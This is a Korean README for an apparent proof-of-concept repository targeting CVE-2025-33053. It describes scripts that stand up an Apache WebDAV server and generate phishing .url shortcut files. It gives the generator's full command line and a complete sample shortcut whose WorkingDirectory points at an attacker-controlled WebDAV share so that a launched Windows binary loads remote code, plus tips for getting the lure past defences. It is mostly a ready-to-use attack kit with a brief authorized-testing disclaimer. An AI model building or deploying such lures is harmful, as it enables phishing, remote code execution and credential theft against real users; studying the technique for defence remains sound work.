
CVE-2025-33053 개념 증명 (PoC)
이 저장소는 Apache2를 사용하여 Ubuntu에 WebDAV 서버를 자동으로 배포하고, 피싱, 레드 팀 운영 또는 측면 이동 시뮬레이션에 사용할 악성 .url 바로 가기 파일을 생성하는 스크립트를 제공합니다.
setup_webdav.sh – Apache2 + WebDAV를 구성하는 Bash 스크립트.setup_webdav.py – 위 스크립트의 Python 버전.gen_url.py – UNC/WebDAV 경로가 포함된 .url 바로 가기 파일을 생성하는 Python 스크립트.README.md – 문서.sudo)sudo bash setup_webdav.sh
또는 Python 사용:
sudo python3 setup_webdav.py
기본적으로 스크립트는 다음을 수행합니다:
/var/www/webdav에 공유 디렉터리 생성.DAV 및 DAV_FS 모듈 활성화.DavLockDB 디렉터리 생성 (Apache DAV 잠금 오류 방지).📎 WebDAV 경로:
http://<your-ip>/webdav/
.url 바로 가기 생성python3 gen_url.py --ip 192.168.1.100 --out doc.url
python3 gen_url.py \
--ip 《YOUR IP ADDRESS》\
--share 《YOUR SHARE NAME》(기본값: webdav) \
--out 《YOUR OUTPUT FILENAME.url》(기본값: bait.url) \
--exe "C:\Program Files\Internet Explorer\iediagcmd.exe" \
--icon "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe" \
--index 13 \
--modified 20F06BA06D07BD014D
다음과 같은 .url 파일이 생성됩니다:
[InternetShortcut]
URL=C:\Program Files\Internet Explorer\iediagcmd.exe
WorkingDirectory=\\192.168.1.100\webdav\
ShowCommand=7
IconIndex=13
IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Modified=20F06BA06D07BD014D
📌 이 파일을 클릭하면 (특정 구성에서) 대상 시스템이 자동으로 WebDAV 서버에 연결될 수 있습니다 (인증 또는 DLL 전달).
sudo ufw allow 80
.url 파일은 다음 조건에 따라 예상대로 실행되지 않을 수 있습니다:
.url 파일을 .txt로 압축하거나 이름을 변경해야 할 수 있습니다.이 저장소는 교육 및 승인된 침투 테스트 전용입니다.
소유하지 않거나 테스트 권한이 없는 시스템에 대해 이 스크립트를 사용하지 마십시오.
질문이나 윤리적인 레드 팀 요청이 있으시면 GitHub 이슈를 통해 연락해 주십시오.